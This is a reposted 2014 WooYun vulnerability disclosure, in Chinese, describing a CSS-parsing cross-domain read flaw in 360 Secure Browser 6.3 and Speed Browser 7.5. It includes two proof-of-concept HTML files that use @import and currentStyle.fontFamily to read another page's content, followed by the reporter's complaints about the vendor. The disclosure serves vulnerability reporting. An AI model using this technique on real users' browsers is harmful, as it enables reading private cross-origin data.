记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

360最新版安全浏览器6.3、极速浏览器7.5及以下版本存在跨域漏洞

2014-09-30 04:35

下载360安全浏览器最新版6.3和极速浏览器最新版7.5

http://se.360.cn/

http://chrome.360.cn/



360安全浏览器和极速浏览器一直都是都是基于IE内核的浏览器



问题发生在CSS Parse的过程中,将fontFamily后面的内容当做了value属性,从而就可以实现跨域

漏洞证明:

先写两个测试的POC:

test1.html

<html>



<head>



<title>test1</title>



</head>



<body>



{}body{font-family:



WooYun



</body>



</html>



test2.html

<html>



<head>

<title>test2</title>

</head>



<body>

<style>



@import url("C:\Users\Administrator\Desktop\test1.html");



</style>



<script>



setTimeout(function(){



var t = document.body.currentStyle.fontFamily;



alert(t);



},2000);



</script>



</body>



</html>



360安全浏览器最新版6.3下测试:

用360安全浏览器6.3访问test2.html



但是要设为IE兼容模式

QQ截图20140704215647.png



弹弹弹....

QQ截图20140704213938.png



极速浏览器最新版7.5下测试:

这两个模式下哪个都可以~

QQ截图20140704214809.png



接着弹弹弹~

QQ截图20140704214741.png





这两个浏览器的所有版本都有这个问题,不信你们试试...



在test2.html 中通过@import加载了 test.html 为CSS文件,渲染进入当前DOM,同时通过 document.body.currentStyle.fontFamily 访问此内容,问题发生在CSS Parse的过程中,将fontFamily后面的内容当做了value,从而读出了test1.html的页面内容.

修复方案:

在次先请让我吐个槽,多谢!

我上次提交的360安全浏览器5.0版本,那个时候是最新版,你不是说从5.0版本停止更新了么,有图有真相

QQ截图20140704212427.png



你还说推荐用户使用360极速浏览器,可我发现极速浏览器也照样有这个问题啊,而且还是最新版!

我可没有什么意思,我也不是为了几个wb提交写这一堆废话,只是觉得学生党提交几个漏洞也不容易,你别说忽略就忽略啊.

就算忽略了也可以,但你们倒是付出实际行动啊,行,就算你接着更新了,但起码不在用IE8内核了也行啊,不是什么用户都会打系统补丁.

一群大妈用360"安全浏览器"或者"极速浏览器"在网购,然后被恶意劫持了,理论上跟360没什么关系,但是用户对360的信任也就没了....

请原谅我这些废话,并无恶意,还望360安全高管们重视我们这群小白提交的漏洞,或许有一天会因为"不在乎"而出现"大麻烦"!


知识来源: www.wooyun.org/bugs/wooyun-2014-067448

阅读:129841 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“360最新版安全浏览器6.3、极速浏览器7.5及以下版本存在跨域漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云